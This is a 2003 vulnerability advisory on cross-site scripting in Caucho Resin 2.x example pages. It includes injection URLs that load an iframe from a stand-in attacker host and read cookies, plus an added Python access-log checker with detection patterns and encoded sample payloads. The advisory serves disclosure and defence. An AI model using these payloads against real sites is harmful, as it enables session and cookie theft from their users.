Message-ID: <Law11-OE49U0AOCh8qK0000685a@hotmail.com>
From: se_cur_ity at hotmail.com (morning_wood)
Subject: Caucho Resin 2.x - Cross Site Scripting
-----------------------------------------------------------------
- EXPL-A-2003-026 exploitlabs.com Advisory 026 -
-----------------------------------------------------------------
-= Caucho Resin =-
Donnie Werner
Oct 18, 2003
Vulnerability(s):
----------------
1. XSS
note: this is not the issue reported at:
http://www.securiteam.com/securitynews/5KP0O1F7FM.html
http://www.securitytracker.com/alerts/2002/Jun/1004552.html
Product:
--------
Caucho Resin Httpd 2.x
Reviews:
--------
http://www.caucho.com/sales/customers.xtp
Description of product:
-----------------------
"Resin is a cutting-edge XML Application Server.
It serves the fastest servlets and JSP."
VULNERABILITY / EXPLOIT
======================
default port 8080 ( others used )
affected scripts:
env.jsp
form.jsp
session.jsp
tictactoe.jsp
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi"></iframe>4
or
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCRIPT>
The above is only an example; all cookie- and session-stealing
Cross Site Scripting was possible.
guestbook.jsp allows persistent XSS
enter evil javascript in "name" and "comment" fields
it is then re-rendered upon revisit
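Added example (not part of the original advisory): a log check for requests to the example scripts listed above that carry markup in the query string. It assumes Common Log Format access logs; the sample lines, addresses and the names decode and suspicious_requests are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Example scripts named in the advisory.
AFFECTED = {"env.jsp", "form.jsp", "session.jsp", "tictactoe.jsp", "guestbook.jsp"}
# Markup that a parameter of these demo pages should never carry.
MARKUP = re.compile(
    r"<\s*/?\s*(script|iframe|img|svg|object|embed)\b"
    r"|\bon(load|error|click|mouseover|focus)\s*=|javascript:", re.I)
# Request field of a Common Log Format line (assumed log format).
REQUEST = re.compile(r'"[A-Z]+ (?P<target>.*) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded markup is still seen."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(log_lines):
    """Return (line_number, script, decoded_query) for each flagged request."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if not match:
            continue
        raw_path, _, raw_query = match.group("target").partition("?")
        path = decode(raw_path).lower()
        script = path.rsplit("/", 1)[-1]
        if "/examples/" not in path or script not in AFFECTED:
            continue
        query = decode(raw_query)
        if MARKUP.search(query):
            hits.append((number, script, query))
    return hits

# Constructed sample lines, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Oct/2003:10:00:01 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=4 HTTP/1.0" 200 1820',
    '198.51.100.7 - - [18/Oct/2003:10:02:11 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=%3Ciframe%20src=%22http://attacker.example/x%22%3E%3C/iframe%3E4 HTTP/1.0" 200 1904',
    '198.51.100.7 - - [18/Oct/2003:10:03:40 +0000] "GET /examples/tictactoe/tictactoe.jsp?move=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.0" 200 1911',
    '203.0.113.5 - - [18/Oct/2003:10:05:02 +0000] "GET /index.jsp?q=%3Cscript%3E HTTP/1.0" 404 312',
]

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

It inspects query strings only; input sent in a request body does not appear in an access log.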
Local:
------
nay
Remote:
-------
yeh
Vendor Fix:
-----------
Versions 3.x don't have the examples included
Vendor Contact:
---------------
bugs@...cho.com
Concurrent with this advisory
Credits:
--------
Donnie Werner
CTO E2 Labs
http://e2-labs.cpm
morning_wood@...labs.com
http://nothackers.org